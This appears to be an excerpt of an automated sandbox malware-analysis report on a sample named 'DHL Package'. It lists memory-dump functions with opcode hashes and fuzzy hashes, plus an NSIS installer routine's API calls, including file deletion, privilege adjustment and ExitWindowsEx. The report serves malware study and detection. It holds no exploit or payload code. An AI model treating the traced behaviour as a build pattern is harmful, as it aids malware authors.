Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3023229a51ef8f0735e0d81418cb1061fb901543bf4048d905077936240fd26c
Instruction ID: b6bd31b6ea07cd118263fd35e2b40336a9f4489b88f7b534d83035d49c5779e9
Opcode Fuzzy Hash: 3023229a51ef8f0735e0d81418cb1061fb901543bf4048d905077936240fd26c
Instruction Fuzzy Hash: 8421D3B5D112199FCB50CFA9D884BDEBBF4EF48310F14856AE818AB244D374AA45CBA4

Function 00154BC8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15bc24eeb45533e3c67569ed1b55b6403b6ec74533d319cb0e6abfaaadb2a4f3
Instruction ID: 2936e2a6d27fd8a4bfa1a4bc2f091505b66e0bbce3d9f5e040c8a8258f6de0ef
Opcode Fuzzy Hash: 15bc24eeb45533e3c67569ed1b55b6403b6ec74533d319cb0e6abfaaadb2a4f3
Instruction Fuzzy Hash: A821B431705209DFDB059F68D845BAB3BA1EB85319F018029F8198F355CB38DD99DBE0

Function 3938CC88 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92e6479617b6f68d20d888046fb2a48a9d1b67d49274f16dd9a61be8c2b099ab
Instruction ID: 17ca6ad452a408c88e324e2c11fbda6652aa4a9bde0b168ab07b522e748583e0
Opcode Fuzzy Hash: 92e6479617b6f68d20d888046fb2a48a9d1b67d49274f16dd9a61be8c2b099ab
Instruction Fuzzy Hash: C121F6B5D012199FCB40CFA9D484BDEFBF4EF48320F14806AE808AB244D374AA44CBA4

Function 393AF2E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbd89d890207a946959d0bb224d6e9b5212d7bb95a2919066dfeb7d11c85f6d
Instruction ID: 722579e5c41d229153cf8b44aebe1f26d2578788a34fc565341f59b8890060e1
Opcode Fuzzy Hash: 5bbd89d890207a946959d0bb224d6e9b5212d7bb95a2919066dfeb7d11c85f6d
Instruction Fuzzy Hash: 0C11C2317093405FEB061B794C645ABBBEAAFCB350B0984B7E445C72E6CD288C0683A2

Function 39387D14 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9126b19a1675a0166e7764c1bd42cd37a1ef36dcfc3335390f1e31668a43947
Instruction ID: 1bd623616c7534d1acad5ee687af9782fc45f71ee3af6fa106bbb9a275524b39
Opcode Fuzzy Hash: b9126b19a1675a0166e7764c1bd42cd37a1ef36dcfc3335390f1e31668a43947
Instruction Fuzzy Hash: 4E1172B5E042188FEB14DFE8C484AEDB7F6FB88349F548125E909A7242D730AD49CB55

Function 00155C76 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7873ca1fd1d04d15397ba90ecf99d0a4ec2f499069b1be6c60acea458f01a097
Instruction ID: df71a19508e3cf9e0f87402e99c3eeb0581daff2bb9a8f41babd3201ffd26eae
Opcode Fuzzy Hash: 7873ca1fd1d04d15397ba90ecf99d0a4ec2f499069b1be6c60acea458f01a097
Instruction Fuzzy Hash: 3F11C235701A11CFDB199B69D86492ABBAAAFCA7527160079EC16CF360CF25DC028B90

Function 39382A28 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d01ee769d5ef0bb96239e3243a10cb67bfc57e577aedc808aa03c0c396cd419d
Instruction ID: 644886876243780d7c0b122d810551b42772b117b8b1f09b86c3260f1418782c
Opcode Fuzzy Hash: d01ee769d5ef0bb96239e3243a10cb67bfc57e577aedc808aa03c0c396cd419d
Instruction Fuzzy Hash: C7119ABA3082009FD714CFA9D454E46B7F6EF887A1F21806AE1098B361CF71EC04CB51

Function 39382FE8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6200de82e457dcaf8511edace0970f6583cdaedc148ef828885789028e5fb8b3
Instruction ID: 0ffaa5e1b71a44a211598fb09b34a65f6b6cac791bed229afe656cff72b7fb55
Opcode Fuzzy Hash: 6200de82e457dcaf8511edace0970f6583cdaedc148ef828885789028e5fb8b3
Instruction Fuzzy Hash: 9011A3F5E153098FDB14EFB8C44069EBBF5AB88690B50413AC41AE3301EB329D45C7D2

Function 3938B6F0 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b0c541af4681e4580a31625701a29810ad0ecb36ad1fac4b3c1b58f236397fa
Instruction ID: c6161f6ee90134bc0c711024fdc7101eed5460e83ae4cbd370a25891c648884c
Opcode Fuzzy Hash: 0b0c541af4681e4580a31625701a29810ad0ecb36ad1fac4b3c1b58f236397fa
Instruction Fuzzy Hash: 761147B680424A9FDB10CF99D844BDEBBF5EF48320F10841AE528A7240C375A554DFA5

Function 00155410 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6899f2aa46faff7abc351edc04c10d2c8a576763950f4807750a2c875e2bf429
Instruction ID: bb6f3522d78fcb87646af50002e81c3334af4d1a99622ec09363199f58a832ea
Opcode Fuzzy Hash: 6899f2aa46faff7abc351edc04c10d2c8a576763950f4807750a2c875e2bf429
Instruction Fuzzy Hash: 6B014E31704255AFDF06CB649820AEF3FA7DBC7751B09406AF844CB151DA318C0A97A1

Function 3938BDF0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0bd56ef1fcdeb59261b0dd99ed8d12b17ddd8a79f0d301f1857aed45004341
Instruction ID: 56ca8e7c58e79e88c52fb6e3d1109db7f32d4bc84525682a6635752851af1a47
Opcode Fuzzy Hash: fa0bd56ef1fcdeb59261b0dd99ed8d12b17ddd8a79f0d301f1857aed45004341
Instruction Fuzzy Hash: 1E117CB680024ADFDB10CF99D844BEEBFF5EF48310F10841AE528A7240C335A555DFA4

Function 3938B319 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b104f82f90c0dca0d81a9127ebe3164a6bccf8d9a0db33320f86768a5b833382
Instruction ID: 37afdef0207ae0186eda292261a11b797c1314b1bf66ada8e4a667bfaf4d20a6
Opcode Fuzzy Hash: b104f82f90c0dca0d81a9127ebe3164a6bccf8d9a0db33320f86768a5b833382
Instruction Fuzzy Hash: 00112A74F0424ACFEB04DFF8D840BDEBBB6AB88355F008062E518A7345E6749D458B51

Function 000AD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6241901953.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_ad000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3801642b371ce085c7fc59adc94de6b5c3728a0055d3e49626c6dff1a83e2599
Instruction ID: 4243c8f205e3fdb7cebca79841abd0b96199b8aa3e9acaf22991fb5d654d4d63
Opcode Fuzzy Hash: 3801642b371ce085c7fc59adc94de6b5c3728a0055d3e49626c6dff1a83e2599
Instruction Fuzzy Hash: 3611D075504280DFCB11CF50D5C4B15BBA2FB85314F24CAAED8494B652C33AD85ACF52

Function 393A4D72 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273592743.00000000393A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 393A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_393a0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7795c348b088260593e8f77fcba698c8710c667b53333b300818b213448535af
Instruction ID: eec49805fd8c7b8dae0fa101b3b21d48f07d0abb5f9072a2f64fb0688e4a1b46
Opcode Fuzzy Hash: 7795c348b088260593e8f77fcba698c8710c667b53333b300818b213448535af
Instruction Fuzzy Hash: A11175B6B402118FD760EF38D80896A3BF4FF8925971106ADE519EB361EB31D802CBD1

Function 39381640 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d503101c2192e77144f93817659002638c5f24f06a86d5cfa80bd8d4685e56e
Instruction ID: 05a82b1576ca3c811440a3a5fe02f1c7bcced415369ffe8e892944fcc682e839
Opcode Fuzzy Hash: 5d503101c2192e77144f93817659002638c5f24f06a86d5cfa80bd8d4685e56e
Instruction Fuzzy Hash: F60192BA904258AFCB119F64DC449EFBFF4FF49351B04812AED6993261D7305A14CB90

Function 39381650 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e2057b0afc56f9accdeacc3e3f574932ce66cbf2421345f882b407f8daa0bc
Instruction ID: b3c6f415ad7415076604cdbf4cc69781abc956c64ba435742a284a04be478870
Opcode Fuzzy Hash: 13e2057b0afc56f9accdeacc3e3f574932ce66cbf2421345f882b407f8daa0bc
Instruction Fuzzy Hash: 710152B5A00209DFDF049FB5DC486AF7BB5FF88350B00453AED1593290DB309A10CBA1

Function 39383081 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ca9f01fe4e2e02f876ba0a3a2bd20a4c55e42212ec9b07b10b76dc550217f3e
Instruction ID: c58c913f0b283e970a0a83f323daed1aa1cdfb5a5734f60e87cd693396dd1e15
Opcode Fuzzy Hash: 3ca9f01fe4e2e02f876ba0a3a2bd20a4c55e42212ec9b07b10b76dc550217f3e
Instruction Fuzzy Hash: FFF0F6B2B4C6505FC71A4B29A41499E7BA5DFC666171400ABD00ADB3A1CE71DC078791

Function 393828C9 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f8fb4f44f3147f84d6095c5ca1f78e19ff2477e33883cd854a3e0346eb3543
Instruction ID: 23f2dd20007299efaa246ae6685d61ea93b8e75d87abff3248a96dbb56880a18
Opcode Fuzzy Hash: 72f8fb4f44f3147f84d6095c5ca1f78e19ff2477e33883cd854a3e0346eb3543
Instruction Fuzzy Hash: A6F09071A04308AFDB90EFA9D841ADFBFF9FB98390B104526E519D7240E7305916CBA2

Function 39382D78 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a793d88b3999db114d8176372e1770eff1ae9a8bdbe2364293ad6711e939a9ed
Instruction ID: 512627ecb09c673b827db4fd7bfdca3312f1dae5bdfc3862d58411e9be793c0c
Opcode Fuzzy Hash: a793d88b3999db114d8176372e1770eff1ae9a8bdbe2364293ad6711e939a9ed
Instruction Fuzzy Hash: 56F03A35304205DFD7008F6AD888D5ABBEAFF88761761816AE5198B330CB71EC15CB80

Function 0015D260 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 457c7f68659bba948c8ea99cf29cdf41f8ba648bb9053b38aa3604878ca01d92
Instruction ID: 447024a6fd059bf52521e94aa2f66186d039da92636aa38ae0abe10ab0bf12fc
Opcode Fuzzy Hash: 457c7f68659bba948c8ea99cf29cdf41f8ba648bb9053b38aa3604878ca01d92
Instruction Fuzzy Hash: 56E02B34C04604EBDF00DBB6E8083EAB7B5EBCB302F405439D504A7124D7785519CFA2

Function 39AC24E8 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0d0a019ef9ccbda99b63b8ef696ef34acd1421802498cbb899ebe6885c44355
Instruction ID: 9cfdd5459f31d3e46fd238a96dd9f768e77aa83c5b0e6ae76f3ce2bc7b0263fb
Opcode Fuzzy Hash: a0d0a019ef9ccbda99b63b8ef696ef34acd1421802498cbb899ebe6885c44355
Instruction Fuzzy Hash: 6EF0F478E19348EFDB01DFB4945168DBFB0AF8A200F5091AAD844AB261D7785A4ACF41

Function 39AC2438 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2616fb5835d8662166188a427139f39c15131deb42c46c27e8c8009f73c5817a
Instruction ID: 5cb3815110e26c1576369a924994816591b4dd5a5ad51cc10969e4d8eb306d6b
Opcode Fuzzy Hash: 2616fb5835d8662166188a427139f39c15131deb42c46c27e8c8009f73c5817a
Instruction Fuzzy Hash: 82F01778D08348AFCB05DFB5991169DBBF4AB8A300F4081EA9844E7255DB345A45CF81

Function 39AC2490 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6274039565.0000000039AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39AC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39ac0000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3a01bd775b347b8403b7f72827d9463bf8f09bf3eb2fc92cc5791fc3df2811
Instruction ID: 47c0329500061d8b4f95224cc72f569eb0fd7c041620e8345c0b23ab0aa7b088
Opcode Fuzzy Hash: 6f3a01bd775b347b8403b7f72827d9463bf8f09bf3eb2fc92cc5791fc3df2811
Instruction Fuzzy Hash: C4F01738D09308EFDB01DFA8D45128DBBB0AF86300F5081AAD854EB365D7344A45CF81

Function 00151E17 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05b70e644b1ca87f1878695828ef8d10eb20097ff8f696657f771ad9a5604a06
Instruction ID: 539a382c6fb216cb2ee1de1522436b9fd12ad6d9a7c07065c532e53390841866
Opcode Fuzzy Hash: 05b70e644b1ca87f1878695828ef8d10eb20097ff8f696657f771ad9a5604a06
Instruction Fuzzy Hash: BBE092319153AA5FC703ABB9DC105DEBF349E9722074545E7D094AB092EA302A4DC3B1

Function 0015D2CC Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 644e9da6f37a60a0bca4bbb2565ce1e30135803b55fe7aed9e7efb316effefad
Instruction ID: a3bb945e1d79ce66fb1769f31be3dacd394d2348af24e6e06c49066a229cd746
Opcode Fuzzy Hash: 644e9da6f37a60a0bca4bbb2565ce1e30135803b55fe7aed9e7efb316effefad
Instruction Fuzzy Hash: CCE0D893C09140DBD72187A268150B97B30D9D7342B446487D8599F425D728C61A9B12

Function 00151E28 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ed7d9d752c2936695c7d384c3256b991eeb5e387bf33ca048101d7dd0c21779
Instruction ID: 22bdd1527f39a6e4f68990700845109d83c6268be71063273fd0eb3ec1894f0e
Opcode Fuzzy Hash: 7ed7d9d752c2936695c7d384c3256b991eeb5e387bf33ca048101d7dd0c21779
Instruction Fuzzy Hash: 24D01231D2022A978B00AAA9DC044DEBB38EED6321B504626D51437140EB70265986E1

Function 0015846F Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2f002181fbd96e442e6d3dcffe0602afbc15d346ef19c8aa2e65e349e6b4eb
Instruction ID: 9bc12a2f2c223091fff994e6970c4ef121ef5eb7a8eb272c5ef64ccded414bcc
Opcode Fuzzy Hash: 2a2f002181fbd96e442e6d3dcffe0602afbc15d346ef19c8aa2e65e349e6b4eb
Instruction Fuzzy Hash: B9C0123354D0646DD725409E3C40EFB5F4CD2C13B5A35027BF86DE714098424C4545A0

Function 39382E28 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6273418656.0000000039380000.00000040.00000800.00020000.00000000.sdmp, Offset: 39380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_39380000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7aedf8595a09b32445fe79d3e103e5d091aa9aae830f506cfa4f27a07f2436
Instruction ID: 2bea6e6467d963234f776cd83560336e74d7c4473e95260a524d107e794df465
Opcode Fuzzy Hash: 3f7aedf8595a09b32445fe79d3e103e5d091aa9aae830f506cfa4f27a07f2436
Instruction Fuzzy Hash: 78D0C937304128BB4B052B99BC19CAE7B6EFBD97717048027F91983710CE719D5297E5

Function 0015A51D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1d521b383939f7b0e04c3884fb4509bdef529365c1d6011e14266efc91e7e6
Instruction ID: 5c9efe974561aadd091f3e6b4235e7f8bf0cc92fda23fa9e18213a652e7d24c6
Opcode Fuzzy Hash: 8c1d521b383939f7b0e04c3884fb4509bdef529365c1d6011e14266efc91e7e6
Instruction Fuzzy Hash: C9D0673AB00008EBDF04DF98EC40DDDB7B6FB9C221B048126E915A3260C6319921DB90

Function 001560C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6243805352.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_DHL Package.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 692fe0e67be4335183b5ee82a88dd4c06be88d60d763254a98ede6bc03101eac
Instruction ID: ca2dfa39b4a9a4a4fa3fc9287557fcea83f007337fdbe4d4a469ad28eab0672a
Opcode Fuzzy Hash: 692fe0e67be4335183b5ee82a88dd4c06be88d60d763254a98ede6bc03101eac
Instruction Fuzzy Hash: 59C0127016070A47E9C1F7B1D85799677AAAFC0214F504414B0090916A9E7C5916DBA5

Non-executed Functions

Function 0040348F Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 004034B2
GetVersion.KERNEL32 ref: 004034B8
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
OleInitialize.OLE32(00000000), ref: 0040352F
SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000007,00000009,0000000B), ref: 00403598

Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD

GetTempPathW.KERNEL32(00000400,00437800,?,00000007,00000009,0000000B), ref: 004036D2
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
lstrcatW.KERNEL32(00437800,\Temp), ref: 004036EF
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000007,00000009,0000000B), ref: 00403703
lstrcatW.KERNEL32(00437800,Low), ref: 0040370B
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000007,00000009,0000000B), ref: 0040371C
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000007,00000009,0000000B), ref: 00403724
DeleteFileW.KERNEL32(00437000,?,00000007,00000009,0000000B), ref: 00403738

Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8

OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
ExitProcess.KERNEL32 ref: 00403824
lstrcatW.KERNEL32(00437800,~nsu), ref: 00403837
lstrcatW.KERNEL32(00437800,0040A26C), ref: 00403846
lstrcatW.KERNEL32(00437800,.tmp), ref: 00403851
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000007,00000009,0000000B), ref: 00403879
DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
AdjustTokenPrivileges.ADVAPI32 ref: 00403982
ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
ExitProcess.KERNEL32 ref: 004039CA

Strings

.tmp, xrefs: 0040384B
UXTHEME, xrefs: 004034DF, 004034E4, 004034EA
NSIS Error, xrefs: 00403551
SeShutdownPrivilege, xrefs: 00403959
~nsu, xrefs: 0040382F
Low, xrefs: 00403705
\Temp, xrefs: 004036E9
TMP, xrefs: 0040371F
TEMP, xrefs: 00403717
Error launching installer, xrefs: 004037BA

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245160989.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_DHL Package.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3195845224
Opcode ID: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
Opcode Fuzzy Hash: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E

Function 00405AED Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,77163420,00437800,00000000), ref: 00405B16
lstrcatW.KERNEL32(00425710,\*.*), ref: 00405B5E
lstrcatW.KERNEL32(?,0040A014), ref: 00405B81
lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,77163420,00437800,00000000), ref: 00405B87
FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,77163420,00437800,00000000), ref: 00405B97
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
FindClose.KERNEL32(00000000), ref: 00405C46

Strings

\*.*, xrefs: 00405B58

Memory Dump Source

Source File: 0000000C.00000002.6244714573.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.6244577095.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.6244929073.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
